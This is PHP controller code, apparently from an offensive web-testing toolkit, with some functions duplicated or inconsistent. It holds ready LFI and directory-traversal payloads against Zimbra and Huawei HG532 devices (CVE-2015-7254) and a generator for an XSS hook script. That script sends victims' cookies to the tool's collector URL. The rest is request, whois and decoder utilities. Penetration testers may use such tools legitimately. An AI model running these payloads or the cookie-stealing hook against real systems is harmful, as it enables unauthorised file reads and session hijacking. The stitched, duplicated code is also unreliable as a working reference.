/**
* @param \Base $f3
* @param array $params
*/
public function viewSingle(\Base $f3, $params)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'larfi_page.html';
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
$this->response->data['POST'] = $this->resource;
if ($this->resource->dry()) {
$f3->error(404, 'LFI Plugin not found');
} else {
$this->response->data['SUBPART'] = 'larfi_page.html';
$url = $f3->get('POST.url');
$blankurl = $f3->devoid('POST.url');
$lfi_type = $f3->get('POST.lType');
$payload = $f3->get('POST.lPayload');
$method = $f3->get('POST.lMethod');
switch ($lfi_type) {
case "Generic":
\Flash::instance()->addMessage('Exploited by injecting into the URL/Body where applicable', 'info');
return $this->uri_based_lfi($method, $blankurl, $url, $payload);
break;
case "Cookie":
\Flash::instance()->addMessage('Exploited by injecting into the cookie', 'info');
return $this->cookie_based_lfi($method, $blankurl, $url, $payload);
break;
default:
\Flash::instance()->addMessage('This is an invalid attack type', 'warning');
}
}
}
}
/**
* @param \Base $f3
* Description This function will be used to create the necessary script needed to hook a page.
*/
function create_campaign(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'xssrc_campaign.html';
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.targetUrl')) {
$error = true;
\Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
} else {
$target_url = $f3->get('POST.targetUrl');
$c_host = parse_url($target_url, PHP_URL_HOST);
$template_src = $f3->ROOT . $f3->BASE . '/scripts/attack_temp.mth3l3m3nt';
$campaign_file = $f3->ROOT . $f3->BASE . '/scripts/' . $c_host . '.js';
$campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js';
$postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr';
copy($template_src, $campaign_file);
$unprepped_contents = file_get_contents($campaign_file);
$unprepped_contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $unprepped_contents);
$unprepped_contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $unprepped_contents);
file_put_contents($campaign_file, $unprepped_contents);
$instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
$this->response->data['content'] = $instructions;
}
}
}
/**
* Zimbra Collaboration Server URI Based LFI
* @param \Base $f3
*/
public function zimbra_lfi(\Base $f3)
{
$lfi = new Larfi();
$f3->set('exploit_title', 'Zimbra Collaboration server LFI (Versions: <=7.2.2 and <=8.0.2 )');
$this->response->data['SUBPART'] = 'lfi_page.html';
$blankurl = $f3->devoid('POST.url');
$url = $f3->get('POST.url');
$payload = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
return $this->uri_based_lfi($blankurl, $url, $payload);
}
/**
* Huawei_lfi
* cve-2015-7254
* Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices allows remote attackers to read arbitrary files via a .. (dot dot) in an icon/ URI.
* @param \Base $f3
* Alternative file read: http://<target_IP>:37215/icon/../../../etc/inittab.
*/
public function huawei_lfi(\Base $f3)
{
$lfi = new Larfi();
$f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
$this->response->data['SUBPART'] = 'lfi_page.html';
$blankurl = $f3->devoid('POST.url');
$url = $f3->get('POST.url');
$payload = ":37215/icon/../../../etc/defaultcfg.xml";
return $this->uri_based_lfi($blankurl, $url, $payload);
}
public function generic_request(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'websaccre_generic_request.html';
$audit_instance = \Audit::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.url')) {
$error = true;
\Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
} else {
$audited_url = $audit_instance->url($f3->get('POST.url'));
if ($audited_url == TRUE) {
/**
*
Shared Hosting Servers Have an issue ..safemode and openbasedir setr and curl gives error enable the lines below and comment out the $request_successful one
$options = array('follow_location'=>FALSE);
$request_successful=$web->request($f3->get('POST.url'),$options);
*
*/
//handle POST data
$postReceive = $f3->get('Post.postReceive');
$postData = explode("&", $postReceive);
$postData = array_map("trim", $postData);
$address = $f3->get('POST.url');
if ($f3->get('POST.means') == "POST") {
$options = array('method' => $f3->get('POST.means'), 'content' => http_build_query($postData));
} else {
$options = array('method' => $f3->get('POST.means'));
}
$request_successful = $web->request($address, $options);
if (!$request_successful) {
\Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
} else {
$result_body = $request_successful['body'];
$result_headers = $request_successful['headers'];
$engine = $request_successful['engine'];
$headers_max = implode("\n", $result_headers);
$myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
$this->response->data['content'] = $myFinalRequest;
}
} else {
\Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
}
}
}
}
/**
* Handles Your little Hurl.it like service to make requests to remote servers using various methods
* @package Controller
*/
public function generic_request(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'websaccre_generic_request.html';
$audit_instance = \Audit::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.url')) {
$error = true;
\Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
} else {
$audited_url = $audit_instance->url($f3->get('POST.url'));
if ($audited_url == TRUE) {
//handle POST data
$postReceive = $f3->get('POST.postReceive');
$createPostArray = parse_str($postReceive, $postData);
if (ini_get('safe_mode')) {
$follow_loc = FALSE;
} else {
$follow_loc = TRUE;
}
$address = $f3->get('POST.url');
if ($f3->get('POST.means') == "POST") {
$options = array('method' => $f3->get('POST.means'), 'content' => http_build_query($postData), 'follow_location' => $follow_loc);
$request_successful = $web->request($address, $options);
} elseif ($f3->get('POST.means') == "GET" or $f3->get('POST.means') == "TRACE" or $f3->get('POST.means') == "OPTIONS" or $f3->get('POST.means') == "HEAD") {
$options = array('method' => $f3->get('POST.means'), 'follow_location' => $follow_loc);
$request_successful = $web->request($address, $options);
} else {
\Flash::instance()->addMessage('Unsupported Header Method', 'danger');
}
if (!$request_successful) {
\Flash::instance()->addMessage('Something went wrong your request could not be completed.', 'warning');
} else {
$result_body = $request_successful['body'];
$result_headers = $request_successful['headers'];
$engine = $request_successful['engine'];
$headers_max = implode("\n", $result_headers);
$myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
$this->response->data['content'] = $myFinalRequest;
}
} else {
\Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
}
}
}
}
public function api_keys(\Base $f3)
{
$this->response->data['SUBPART'] = 'settings_unphp_api.html';
$cfg = \Config::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.unphp_api_key')) {
$error = true;
\Flash::instance()->addMessage('Please enter an API Key from unphp.net ', 'warning');
} else {
$cfg->set('unphp_api_key', $f3->get('POST.unphp_api_key'));
}
if (!$error) {
\Flash::instance()->addMessage('Configuration saved', 'success');
$cfg->save();
}
}
$cfg->copyto('POST');
}
public function getwhois(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'websaccre_whois.html';
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.hostname')) {
$error = true;
\Flash::instance()->addMessage('Please enter a hostname e.g. africahackon.com', 'warning');
} else {
$address = $f3->get('POST.hostname');
$mywhois = $web->whois($address);
if (!$mywhois) {
\Flash::instance()->addMessage('You have entered an invalid hostname try something like: africahackon.com', 'warning');
} else {
$this->response->data['content'] = $mywhois;
}
}
}
}
public function general(\Base $f3)
{
$this->response->data['SUBPART'] = 'settings_general.html';
$cfg = \Config::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.blog_title')) {
$error = true;
\Flash::instance()->addMessage('Please enter a Blog Title', 'warning');
} else {
$cfg->set('blog_title', $f3->get('POST.blog_title'));
}
$cfg->set('ssl_backend', $f3->get('POST.ssl_backend') == '1');
$cfg->set('auto_approve_comments', $f3->get('POST.auto_approve_comments') == '1');
if (!$error) {
\Flash::instance()->addMessage('Config saved', 'success');
$cfg->save();
}
}
$cfg->copyto('POST');
}
/**
* Handles Decoding Functions
* @param \Base $f3
*/
public function decoder_multi(\Base $f3)
{
$this->response->data['SUBPART'] = 'dencoder_decoder_multi.html';
$audit_instance = \Audit::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.encoded')) {
$error = true;
\Flash::instance()->addMessage('Please enter Some text to decode e.g. 0xaaaa ', 'warning');
} else {
$encoded_text_string = $f3->get('POST.encoded');
$encodedFormat = $f3->get('POST.encodedFormat');
switch ($encodedFormat) {
case "base64":
$decoded = trim($encoded_text_string);
if (base64_encode(base64_decode($decoded)) === $decoded) {
$decoded = base64_decode($decoded, true);
$this->response->data['content'] = $decoded;
} else {
\Flash::instance()->addMessage('Please enter a valid base 64 string e.g. dGVzdG1l ', 'warning');
}
break;
case "hex":
$decoded = trim($encoded_text_string);
if (is_numeric('0x' . $decoded)) {
if (function_exists('hex2bin')) {
$decoded = hex2bin($decoded);
$this->response->data['content'] = $decoded;
} else {
\Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
}
} else {
\Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
}
break;
case "hex_0x":
$clear_prefix = str_replace("0x", "", $encoded_text_string);
$clear_prefix = trim($clear_prefix);
if (is_numeric('0x' . $clear_prefix)) {
if (function_exists('hex2bin')) {
$decoded = hex2bin($clear_prefix);
$this->response->data['content'] = $decoded;
} else {
\Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
}
} else {
\Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
}
break;
case "hex_slash_x":
$clear_prefix = str_replace("\\x", "", $encoded_text_string);
$clear_prefix = trim($clear_prefix);
if (is_numeric('0x' . $clear_prefix)) {
if (function_exists('hex2bin')) {
$decoded = hex2bin($clear_prefix);
$this->response->data['content'] = $decoded;
} else {
\Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
}
} else {
\Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
}
break;
case "rot13":
$decoded = str_rot13(trim($encoded_text_string));
$this->response->data['content'] = $decoded;
break;
default:
\Flash::instance()->addMessage('Seems You have Broken something or text is invalid \\n I can\'t process', 'warning');
}
}
}
}
